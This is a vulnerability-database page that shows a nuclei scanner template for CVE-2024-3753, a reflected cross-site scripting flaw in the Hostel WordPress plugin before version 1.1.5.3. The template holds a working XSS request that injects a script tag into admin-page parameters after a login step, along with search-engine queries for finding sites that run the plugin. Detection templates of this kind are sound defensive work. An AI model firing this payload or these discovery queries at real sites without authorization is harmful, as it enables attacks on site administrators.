Lucene search
K

Hostel < 1.1.5.3 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Hostel WordPress plugin < 1.1.5.3 - XSS vulnerability, allows Reflected Cross-Site Scriptin

Related
Refs
Code
id: CVE-2024-3753

info:
  name: Hostel < 1.1.5.3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Hostel WordPress plugin before 1.1.5.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Attackers can potentially exploit this XSS vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update the plugin to Latest version. Fixed in 1.1.5.3.
  reference:
    - https://wpscan.com/vulnerability/e140e109-4176-4b26-bf63-198262a31409/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3753
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2024-3753
    cwe-id: CWE-79
    epss-score: 0.00807
    epss-percentile: 0.52304
    cpe: cpe:2.3:a:kibokolabs:hostel:*:*:*:*:wordpress:*:*:*
  metadata:
    max-request: 3
    fofa-query: body="/wp-content/plugins/hostel"
    publicwww-query: /wp-content/plugins/hostel/
    shodan-query: http.html:"/wp-content/plugins/hostel/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,hostel,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/hostel"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wphostel_bookings&do=edit&id=&type=upcoming&offset="><script>alert(document.domain)<%2Fscript>&type="><script>alert(document.domain)<%2Fscript> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: content_type_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220351fb91ca470c42b2e071d65bacc3a8d4d77a6bbcb9454a48933b94520cb95ff0220557b43733cfb0721c2744a3dd6ffe67676116ec672621b3117c8e925f0e32aa1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.9
EPSS0.00807
SSVC
22